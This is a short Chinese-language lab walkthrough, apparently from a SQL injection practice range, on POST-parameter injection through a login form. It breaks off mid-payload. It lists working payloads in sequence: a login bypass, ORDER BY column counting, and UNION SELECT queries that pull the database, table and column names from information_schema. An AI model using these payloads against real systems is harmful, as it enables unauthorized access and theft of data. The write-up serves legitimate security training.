zkaq-SQL
post注入post传参类型的注入,与get注入很像。post注入经常出现在登录框且通常是字符型。
靶场演练Pass-051构造' or 1=1 -- a
成功登录,判断的我们的输入的数据有被当做SQL语句执行。
构造
12' or 1=1 order by 3 -- a登录成功' or 1=1 order by 4 -- a登录失败
判断页面有三个字段
暴库名
构造
1'union select 1,2,database() -- a
暴表名
构造
1'union select 1,2,table_name from information_Schema.tables where table_schema=database() limit 0,1 -- a
暴字段
构造
1'union select 1,2,column_name from information_Schema.columns where table_schema=database() and table_name=' ...